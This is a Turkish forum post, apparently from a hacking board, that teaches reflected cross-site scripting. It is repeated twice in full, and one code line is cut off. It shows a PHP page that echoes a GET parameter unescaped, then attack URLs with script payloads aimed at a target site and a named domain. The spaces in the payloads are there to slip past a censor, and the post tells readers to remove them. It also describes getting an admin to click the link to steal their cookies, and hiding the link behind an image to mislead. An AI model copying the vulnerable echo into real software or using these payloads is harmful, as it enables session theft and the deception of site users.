Bir Php Kod oLsun
Alıntı:
form action="antijen.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
< ? p h p
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
? >
dosyanın adı antijen.php oLsun...
Xss açığını yaratan hasarlı kod :
PHP Kodu:
echo ($_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
PHP Kodu:
http://hedefsiteadresi.com/antijen.php?name_1=<s cript>al er t(1);</scrip t>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
antijen.php 'de şu kodlar olsun :
PHP Kodu:
here $_GET['Exploit
Saldırılacak şekil :
PHP Kodu:
http://www.karaalevteam.com/antijen.php?Exploit=<sc ript>al ert(1);</sc ript
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
Alıntı
Not : a.l.e.r.t ve s.c.r.i.p.t gibi yerlerde boşluk bırakılmıştır.siz bu boşlukları birleştirin.sansür koyulduğundan dolayı aralarında boşluk bırakılmıştır.
Alıntı:
form action="antijen.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
< ? p h p
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
? >
dosyanın adı antijen.php oLsun...
Xss açığını yaratan hasarlı kod :
PHP Kodu:
echo ($_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
PHP Kodu:
http://hedefsiteadresi.com/antijen.php?name_1=<s cript>al er t(1);</scrip t>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
antijen.php 'de şu kodlar olsun :
PHP Kodu:
here $_GET['Exploit
Saldırılacak şekil :
PHP Kodu:
http://www.karaalevteam.com/antijen.php?Exploit=<sc ript>al ert(1);</sc ript
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
Alıntı
Not : a.l.e.r.t ve s.c.r.i.p.t gibi yerlerde boşluk bırakılmıştır.siz bu boşlukları birleştirin.sansür koyulduğundan dolayı aralarında boşluk bırakılmıştır.
